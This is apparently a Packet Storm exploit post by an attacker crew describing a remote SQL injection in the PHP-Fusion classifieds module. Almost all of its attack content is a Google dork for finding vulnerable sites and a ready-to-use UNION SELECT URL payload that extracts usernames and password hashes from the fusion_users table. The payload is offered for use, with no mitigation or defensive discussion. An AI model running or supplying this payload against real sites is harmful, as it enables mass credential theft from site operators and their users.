The PHP-Fusion classifieds module suffers from a remote SQL injection vulnerability.
01257d4d193074b2604955447d4796e629e0fdb1dd80ce3471dc5bee1ec92cdd#################################
Php fusion "classifieds" SQL-injetion
#################################
++++++++++++++++++++++++++++
Author : boom3rang
contact : boomerang [at] knaqu-shqipe [dot] de
webpage : www.khg-crew.ws
++++++++++++++++++++++++++++
----> Remote SQL Injection <------
[+] Dork: inurl:"classifieds.php?op=detail_adverts"
[+] Example: www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid= [SQL]
exploit:
www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid=-9999+union+all+select+1,user_name,user_password,4,5,6,null,null+from+fusion_users--
##########################################
greetz to: All my albanian brothers
=United State of Albania =
##########################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed